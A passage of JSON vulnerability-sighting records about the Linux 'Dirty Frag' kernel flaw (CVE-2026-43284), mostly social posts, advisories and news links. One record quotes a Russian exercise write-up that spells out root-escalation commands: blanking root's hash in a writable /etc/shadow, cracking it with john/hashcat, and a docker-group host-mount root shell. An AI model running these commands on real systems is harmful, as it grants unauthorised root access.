"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlhpojezmi2z", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 164 interactions\nCVE-2026-43284: 120 interactions\nCVE-2026-43500: 84 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-43284: 59 interactions\nCVE-2026-43500: 53 interactions\nCVE-2026-31431: 14 interactions\n", "creation_timestamp": "2026-05-10T02:30:15.588016Z"}, {"uuid": "ea418d32-ccaf-4920-8da9-a99277d876b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/e11bits.mastodon.social.ap.brid.gy/post/3mlhxbkk2srs2", "content": "It feels like a new LPE is surfacing every week now. Again big thanks to the #debian #security team for their swift reaction and persistent commitment to keep debian secure. \ud83d\ude4f\n\nhttps://security-tracker.debian.org/tracker/CVE-2026-43284", "creation_timestamp": "2026-05-10T04:46:11.376365Z"}, {"uuid": "dcb5c07d-bb50-4dae-b239-3e6966e2e04a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://mastodon.social/ap/users/115755483699003887/statuses/116539544258210938", "content": "\ud83d\udfe0 CVE-2026-43284 - High (7.8)\nIn the Linux kernel, the following vulnerability has been resolved:\nxfrm: esp: avoid in-place decrypt on shared skb frags\nMSG_SPLICE_PAGES can attach pages from a pipe directly to an skb. TCPmarks such skbs with SKBFL_SHARED_FRAG after skb_spli...\n\ud83d\udd17 https://www.thehackerwire.com/vulnerability/CVE-2026-43284/\n#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack", "creation_timestamp": "2026-05-08T14:58:52.220147Z"}, {"uuid": "8fa19b5a-53eb-4934-a518-ef9836914205", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://t.me/GithubRedTeam/83624", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43500\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a attaattaatta\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-10 07:57:52\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43500 / CVE-2026-31431 / CVE-2026-43284 golang hotfix\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-10T08:00:04.000000Z"}, {"uuid": "3fd17337-7c1d-45fe-a76d-f7a584a03011", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/lanesystems.bsky.social/post/3mle2op6s6k2j", "content": "#DirtyFrag #Linux flaw one-ups #CopyFail with no patches and public root exploit\nwww.theregister.com/security/202...\n\nFresh privilege escalation bug now assigned CVE-2026-43284.\n#CyberSecurity #InfoSec #Vulnerability #CVE202643284", "creation_timestamp": "2026-05-08T15:36:35.578948Z"}, {"uuid": "71b1374f-0941-4a6b-b882-ceeb68320ff1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/eu-technology.bsky.social/post/3mldzrffwwl2y", "content": "New Linux \u2018Dirty Frag\u2019 zero-day gives root on all major distros\n\nhttps://www.europesays.com/uk/946255/\n\nA new Linux zero-day vulnerability, named Dirty Frag and tracked as CVE-2026-43284, allows local attackers to gain root\u2026", "creation_timestamp": "2026-05-08T15:20:23.239379Z"}, {"uuid": "247c707e-a90e-420a-9015-08afbbdfc68b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/Anarcat.kolektiva.social.ap.brid.gy/post/3mle3b6xlyga2", "content": "#Debian security team just released DSA-6253-1 which addresses #dirtyfrag local root escalation which has been issued CVE-2026-43284 and CVE-2026-43500", "creation_timestamp": "2026-05-08T15:50:40.349460Z"}, {"uuid": "dee9b1b9-f647-4b15-8ad8-d38779df9279", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://gist.github.com/tryharderhvh/aed5f1a11b1565ae4b921a642bce064b", "content": "\u0417\u0430\u0434\u0430\u0447\u0430 1\n\u0423\u0441\u043b\u043e\u0432\u0438\u0435: \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c user, \u0444\u0430\u0439\u043b /etc/shadow, \u043f\u0440\u0430\u0432\u0430 -rw----rw-, \u0432\u043b\u0430\u0434\u0435\u043b\u0435\u0446 root, \u0433\u0440\u0443\u043f\u043f\u0430 user.\n\n\u041a\u0430\u043a Linux \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043f\u0440\u0430\u0432\u0430: \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0441\u043c\u043e\u0442\u0440\u0438\u0442, \u0432\u043b\u0430\u0434\u0435\u043b\u0435\u0446 \u043b\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441, \u0438\u043d\u0430\u0447\u0435 \u2014 \u0432\u0445\u043e\u0434\u0438\u0442 \u043b\u0438 \u0432 \u0433\u0440\u0443\u043f\u043f\u0443 \u0444\u0430\u0439\u043b\u0430, \u0438\u043d\u0430\u0447\u0435 \u2014 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442 other. \u041f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u043e\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043d\u0430 \u043f\u0435\u0440\u0432\u043e\u043c \u0441\u043e\u0432\u043f\u0430\u0434\u0435\u043d\u0438\u0438 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438, \u0434\u0430\u0436\u0435 \u0435\u0441\u043b\u0438 \u0435\u0451 \u0431\u0438\u0442\u044b \u0441\u0442\u0440\u043e\u0436\u0435, \u0447\u0435\u043c other.\n\n\u041f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u043a user:\n- \u0412\u043b\u0430\u0434\u0435\u043b\u0435\u0446? \u041d\u0435\u0442, \u0432\u043b\u0430\u0434\u0435\u043b\u0435\u0446 root.\n- \u0412 \u0433\u0440\u0443\u043f\u043f\u0435 user? \u0414\u0430, \u044d\u0442\u043e \u0435\u0433\u043e \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u0430\u044f primary-\u0433\u0440\u0443\u043f\u043f\u0430 (\u0441\u0445\u0435\u043c\u0430 User Private Group, \u0434\u0435\u0444\u043e\u043b\u0442 \u0432 Debian/Ubuntu/RHEL/Fedora). \u0423\u0441\u043b\u043e\u0432\u0438\u0435 \u0437\u0430\u0434\u0430\u0447\u0438 \u044d\u0442\u043e \u043f\u043e\u0434\u0440\u0430\u0437\u0443\u043c\u0435\u0432\u0430\u0435\u0442: \u0441\u043e\u0432\u043f\u0430\u0434\u0435\u043d\u0438\u0435 \u0438\u043c\u0451\u043d \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u0433\u0440\u0443\u043f\u043f\u044b \u0444\u0430\u0439\u043b\u0430 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 UPG. \u0415\u0441\u043b\u0438 \u0431\u044b \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0431\u044b\u043b\u0430 \u043d\u0435-UPG \u0438 user \u0432 \u0433\u0440\u0443\u043f\u043f\u0443 user \u043d\u0435 \u0432\u0445\u043e\u0434\u0438\u043b, \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u043f\u0430\u0434\u0430\u043b\u0430 \u0431\u044b \u0432 other \u2192 rw- \u2192 \u0434\u043e\u0441\u0442\u0443\u043f \u0431\u044b\u043b \u0431\u044b \u043e\u0442\u043a\u0440\u044b\u0442. \u0412\u0441\u0435 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0438\u0435 \u0432\u044b\u0432\u043e\u0434\u044b Task 1 \u0441\u0442\u0440\u043e\u044f\u0442\u0441\u044f \u043d\u0430 UPG-\u0434\u043e\u043f\u0443\u0449\u0435\u043d\u0438\u0438.\n- \u041f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f group-\u0431\u0438\u0442\u044b: --- \u2192 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043d\u0435\u0442.\n\n\u0411\u0438\u0442\u044b rw- \u0438\u0437 other \u043d\u0435\u0434\u043e\u0441\u0442\u0438\u0436\u0438\u043c\u044b, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u044f\u0434\u0440\u043e \u043e\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043d\u0430 \u0441\u043e\u0432\u043f\u0430\u0434\u0435\u043d\u0438\u0438 \u0433\u0440\u0443\u043f\u043f\u044b.\n\n\u041e\u0442\u0432\u0435\u0442: \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0447\u0435\u0440\u0435\u0437 /etc/shadow \u0432 \u044d\u0442\u043e\u0439 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u043d\u0435\u043b\u044c\u0437\u044f. Open(O_RDONLY) \u0438 open(O_WRONLY) \u0432\u0435\u0440\u043d\u0443\u0442 EACCES.\n\n\u0421\u043f\u043e\u0441\u043e\u0431\u044b \u043e\u0431\u0445\u043e\u0434\u0430 \u0438 \u043f\u043e\u0447\u0435\u043c\u0443 \u043e\u043d\u0438 \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442:\n- newgrp / sg \u2014 \u043c\u0435\u043d\u044f\u044e\u0442 \u0442\u043e\u043b\u044c\u043a\u043e primary GID, supplementary-\u0447\u043b\u0435\u043d\u0441\u0442\u0432\u043e \u0432 user \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442\u0441\u044f.\n- setgroups(0, NULL) \u0438 setpriv --clear-groups \u2014 \u0442\u0440\u0435\u0431\u0443\u044e\u0442 CAP_SETGID, \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0443 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043d\u0435\u0442.\n- User namespaces (unshare -Urm) \u2014 DAC-\u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u044f\u0434\u0440\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 kuid/kgid \u0438 \u043d\u0435 \u043f\u0435\u0440\u0435\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0435\u0442 \u0438\u0445 \u043f\u043e\u0434 user-namespace mapping. \u0421\u0431\u0440\u043e\u0441\u0438\u0442\u044c supplementary-\u0433\u0440\u0443\u043f\u043f\u044b \u0442\u043e\u0436\u0435 \u043d\u0435\u043b\u044c\u0437\u044f: \u0434\u043b\u044f \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e userns \u044f\u0434\u0440\u043e \u043f\u0440\u0438\u043d\u0443\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u0442\u0430\u0432\u0438\u0442 /proc/PID/setgroups=deny, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 setgroups(0, NULL) \u0432\u043d\u0443\u0442\u0440\u0438 namespace \u043d\u0435 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442. \u0413\u0440\u0443\u043f\u043f\u0430 user \u043e\u0441\u0442\u0430\u0451\u0442\u0441\u044f \u0432 credentials \u2192 in_group_p() \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 true \u2192 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f group-\u0431\u0438\u0442\u044b --- \u2192 \u0434\u043e\u0441\u0442\u0443\u043f \u0437\u0430\u043a\u0440\u044b\u0442.\n- Bind-mount, hardlink, \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u2014 \u043d\u0435 \u043c\u0435\u043d\u044f\u044e\u0442 \u043f\u0440\u0430\u0432\u0430 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0433\u043e inode \u0438 \u0441\u0430\u043c\u0438 \u0442\u0440\u0435\u0431\u0443\u044e\u0442 read-\u0434\u043e\u0441\u0442\u0443\u043f\u0430.\n\n\u0414\u043e\u043f\u0443\u0449\u0435\u043d\u0438\u0435: \u043d\u0430 /etc/shadow \u043d\u0435\u0442 POSIX ACL. Named-user ACL \u0432\u044b\u0447\u0438\u0441\u043b\u044f\u0435\u0442\u0441\u044f \u0440\u0430\u043d\u044c\u0448\u0435 group/other, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0437\u0430\u043f\u0438\u0441\u044c \u0432\u0438\u0434\u0430 `user:user:rw-` \u043f\u0435\u0440\u0435\u043a\u0440\u044b\u043b\u0430 \u0431\u044b \u043f\u0443\u0441\u0442\u044b\u0435 group-\u0431\u0438\u0442\u044b \u0438 \u0434\u0430\u043b\u0430 \u0431\u044b \u0434\u043e\u0441\u0442\u0443\u043f. \u0423\u0441\u043b\u043e\u0432\u0438\u0435 \u0437\u0430\u0434\u0430\u0447\u0438 ACL \u043d\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442 \u2014 \u0441\u0447\u0438\u0442\u0430\u0435\u043c, \u0447\u0442\u043e \u0438\u0445 \u043d\u0435\u0442. \u041d\u0430 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c `getfacl /etc/shadow`.\n\n\u041e\u0433\u043e\u0432\u043e\u0440\u043a\u0430 \u043f\u0440\u043e \u0432\u0435\u043a\u0442\u043e\u0440 \u043c\u0438\u043c\u043e /etc/shadow. \u0412\u044b\u0432\u043e\u0434 \"\u0447\u0435\u0440\u0435\u0437 \u044d\u0442\u0438 \u043f\u0440\u0430\u0432\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c root \u043d\u0435\u043b\u044c\u0437\u044f\" \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u0435\u043d \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f DAC-\u043f\u043b\u043e\u0441\u043a\u043e\u0441\u0442\u0438. \u041d\u0430 \u0443\u0440\u043e\u0432\u043d\u0435 \u044f\u0434\u0440\u0430 7-8 \u043c\u0430\u044f 2026 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d Dirty Frag \u2014 \u0441\u0432\u044f\u0437\u043a\u0430 CVE-2026-43284 (esp4/esp6) \u0438 CVE-2026-43500 (rxrpc): in-place decryption fast paths \u0434\u0435\u043a\u0440\u0438\u043f\u0442\u0443\u044e\u0442 \u043f\u043e\u0432\u0435\u0440\u0445 paged-\u0444\u0440\u0430\u0433\u043c\u0435\u043d\u0442\u043e\u0432 skb, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0435\u0449\u0451 \u0434\u0435\u0440\u0436\u0438\u0442 \u0441\u0441\u044b\u043b\u043a\u0443, \u0447\u0442\u043e \u0434\u0430\u0451\u0442 write \u043f\u043e kernel-side \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430\u043c \u0438 LPE \u0434\u043e root \u043e\u0434\u043d\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439 \u043d\u0430 \u0432\u0441\u0435\u0445 major distros (Ubuntu, RHEL, AlmaLinux, CloudLinux). \u0420\u0435\u0433\u0440\u0435\u0441\u0441\u0438\u044f \u0432 xfrm-ESP \u0441 2017, \u0432 RxRPC \u0441 2023. \u041d\u0430 8 \u043c\u0430\u044f \u043f\u0430\u0442\u0447 \u0432\u044b\u0448\u0435\u043b \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 43284, \u043d\u0430 43500 \u2014 \u043d\u0435\u0442; \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u0430\u044f \u043c\u0438\u0442\u0438\u0433\u0430\u0446\u0438\u044f \u2014 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u043c\u043e\u0434\u0443\u043b\u0435\u0439 (`/etc/modprobe.d/dirtyfrag.conf` \u0441 `install esp4|esp6|rxrpc /bin/false` \u0438 `rmmod`). \u041a \u0443\u0441\u043b\u043e\u0432\u0438\u044e \u0437\u0430\u0434\u0430\u0447\u0438 \u044d\u0442\u043e \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u043c\u043e \u0432 \u0442\u043e\u043c \u0441\u043c\u044b\u0441\u043b\u0435, \u0447\u0442\u043e \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0441 \u0448\u0435\u043b\u043b\u043e\u043c user \u0431\u0435\u0437\u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b group-\u0431\u0438\u0442\u044b shadow \u2014 \u043e\u043d \u0431\u0435\u0440\u0451\u0442 root \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0447\u0435\u0440\u0435\u0437 \u044f\u0434\u0440\u043e.\n\n\u0417\u0430\u0434\u0430\u0447\u0430 2\n\u0423\u0441\u043b\u043e\u0432\u0438\u0435: \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c user, \u0433\u0440\u0443\u043f\u043f\u044b user cdrom vboxusers docker, \u0444\u0430\u0439\u043b /etc/shadow, \u043f\u0440\u0430\u0432\u0430 -rw----rw-, \u0432\u043b\u0430\u0434\u0435\u043b\u0435\u0446 root, \u0433\u0440\u0443\u043f\u043f\u0430 adm.\n\n\u041f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u043a user:\n- \u0412\u043b\u0430\u0434\u0435\u043b\u0435\u0446? \u041d\u0435\u0442.\n- \u0412 \u0433\u0440\u0443\u043f\u043f\u0435 adm? \u041d\u0435\u0442, \u0432 \u0441\u043f\u0438\u0441\u043a\u0435 \u0433\u0440\u0443\u043f\u043f \u0435\u0451 \u043d\u0435\u0442.\n- \u041f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f other-\u0431\u0438\u0442\u044b: rw- \u2192 \u0447\u0442\u0435\u043d\u0438\u0435 \u0438 \u0437\u0430\u043f\u0438\u0441\u044c \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u044b.\n\n\u0414\u043e\u043f\u0443\u0449\u0435\u043d\u0438\u0435: \u043d\u0430 /etc/shadow \u043d\u0435\u0442 POSIX ACL. Named-user ACL `user:user:---` \u0432\u044b\u0447\u0438\u0441\u043b\u044f\u043b\u0430\u0441\u044c \u0431\u044b \u0440\u0430\u043d\u044c\u0448\u0435 other \u0438 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0431\u044b \u0434\u043e\u0441\u0442\u0443\u043f. \u041c\u0430\u0441\u043a\u0430 (ACL_MASK) \u043d\u0430 other \u043d\u0435 \u0432\u043b\u0438\u044f\u0435\u0442 \u2014 \u043c\u0430\u0441\u043a\u0430 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043a named-user, owning-group \u0438 named-group entries. \u0423\u0441\u043b\u043e\u0432\u0438\u0435 \u0437\u0430\u0434\u0430\u0447\u0438 ACL \u043d\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442 \u2014 \u0441\u0447\u0438\u0442\u0430\u0435\u043c, \u0447\u0442\u043e \u0438\u0445 \u043d\u0435\u0442. \u041d\u0430 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c `getfacl /etc/shadow`.\n\n\u041e\u0442\u0432\u0435\u0442: \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u043c\u043e\u0436\u043d\u043e, \u043f\u0440\u0438\u0447\u0451\u043c \u0434\u0432\u0443\u043c\u044f \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u044b\u043c\u0438 \u043f\u0443\u0442\u044f\u043c\u0438\n\n\u041f\u0443\u0442\u044c 1 \u2014 \u0447\u0435\u0440\u0435\u0437 \u043f\u0440\u0430\u0432\u0430 \u043d\u0430 /etc/shadow. \u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u043f\u043e\u043b\u0435 \u0445\u0435\u0448\u0430 root:\n1. \u0421\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0445\u0435\u0448: openssl passwd -6 'NewPass'\n2. \u041f\u043e\u0434\u043c\u0435\u043d\u0438\u0442\u044c \u0445\u0435\u0448: sed -i \"s|^root:[^:]*:|root::|\" /etc/shadow\n3. su - \u0438 \u0432\u043e\u0439\u0442\u0438 \u043f\u043e\u0434 root \u0441 \u0437\u0430\u0434\u0430\u043d\u043d\u044b\u043c \u043f\u0430\u0440\u043e\u043b\u0435\u043c\n\u0410\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u0430 \u2014 \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c shadow, \u0441\u043a\u043b\u0435\u0438\u0442\u044c unshadow \u0441 /etc/passwd \u0438 \u043a\u0440\u044d\u043a\u043d\u0443\u0442\u044c john/hashcat (\u0442\u0438\u0448\u0435, \u0431\u0435\u0437 \u0437\u0430\u043f\u0438\u0441\u0438)\n\n\u041f\u0443\u0442\u044c 2 \u2014 \u0447\u0435\u0440\u0435\u0437 \u0433\u0440\u0443\u043f\u043f\u0443 docker. \u0427\u043b\u0435\u043d\u0441\u0442\u0432\u043e \u0432 docker \u044d\u043a\u0432\u0438\u0432\u0430\u043b\u0435\u043d\u0442\u043d\u043e root: \u0434\u0435\u043c\u043e\u043d \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043e\u0442 root, \u043b\u044e\u0431\u043e\u0439 \u0447\u043b\u0435\u043d \u0433\u0440\u0443\u043f\u043f\u044b \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0438\u043c \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u043a\u0435\u0442. \u041a\u043e\u043c\u0430\u043d\u0434\u0430 docker run --rm -it -v /:/mnt alpine chroot /mnt sh \u0434\u0430\u0451\u0442 root-\u0448\u0435\u043b\u043b \u043d\u0430 \u0445\u043e\u0441\u0442\u0435 \u0431\u0435\u0437 \u043a\u0430\u0441\u0430\u043d\u0438\u044f /etc/shadow.\n\n\u0418\u0442\u043e\u0433: \u0432 \u0437\u0430\u0434\u0430\u0447\u0435 2 \u044d\u0441\u043a\u0430\u043b\u0430\u0446\u0438\u044f \u0442\u0440\u0438\u0432\u0438\u0430\u043b\u044c\u043d\u0430 \u043a\u0430\u043a \u043c\u0438\u043d\u0438\u043c\u0443\u043c \u0434\u0432\u0443\u043c\u044f \u0441\u043f\u043e\u0441\u043e\u0431\u0430\u043c\u0438.\n", "creation_timestamp": "2026-05-10T17:36:51.000000Z"}, {"uuid": "073545e0-3d6b-47c0-9a10-d62564200222", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mljr5rhd6i22", "content": "Dirty Frag (CVE-2026-43284, CVE-2026-43500): Frequently asked questions about this Linux kernel privilege escalation vulnerability chain Weeks after the Copy Fail vulnerability was revealed, a new ...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-10T22:02:05.671322Z"}, {"uuid": "56a4de1b-ed88-4408-9673-2e36c75d8865", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/securitylab-jp.bsky.social/post/3mljujvcrks2a", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027 Dirty Frag\u3067root\u596a\u53d6\u304c\u53ef\u80fd(CVE-2026-43284\u30fbCVE-2026-43500)\n\nrocket-boys.co.jp/security-mea...\n\n#\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u5bfe\u7b56Lab #security #securitynews", "creation_timestamp": "2026-05-10T23:02:32.016015Z"}, {"uuid": "c8601659-d64b-41cc-a5a5-ee28064dba3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43284", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3mljwz24txa2t", "content": "Dirty Frag (CVE-2026-43284/43500) \u2014 Copy Fail\u306e\u66ab\u5b9a\u7b56\u304c\u52b9\u304b\u306a\u3044\u7406\u7531\u3068\u672a\u30d1\u30c3\u30c1\u671f\u306e\u7ba1\u7406\u8005\u5bfe\u5fdc\nhttps://zenn.dev/linuxmaster/articles/dirty-frag-cve-2026-43284-43500", "creation_timestamp": "2026-05-10T23:46:45.593143Z"}, {"uuid": "a2932f23-5971-47c3-8aea-c0ee5c499f25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/threatintel.microsoft.com/post/3mleath2kmz2p", "content": "A newly disclosed Linux local privilege escalation vulnerability known as \u201cDirty Frag\u201d enables escalation from an unprivileged user to root through vulnerable kernel networking & memory-fragment handling components, including esp4, esp6 (CVE-2026-43284), and rxrpc (CVE-2026-43500). msft.it/6015v3WNc", "creation_timestamp": "2026-05-08T17:26:35.596821Z"}, {"uuid": "35946c1e-30d2-466c-af3b-96f7923504ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mlk7psdid6r2", "content": "Dirty Frag (CVE-2026-43284, CVE-2026-43500): Mitigation and Kernel Update on CloudLinux A week after Copy Fail (CVE-2026-31431), researcher Hyunwoo Kim disclosed a second Linux kernel local privil...\n\n#KernelCare #CVE #Vulnerability #Kernel #Update #AlmaLinux #CloudLinux\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-11T02:22:41.465393Z"}, {"uuid": "7276405c-4258-4bb4-9911-15b104d33fb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlka652tl522", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 141 interactions\nCVE-2026-43284: 122 interactions\nCVE-2026-43500: 84 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-42511: 56 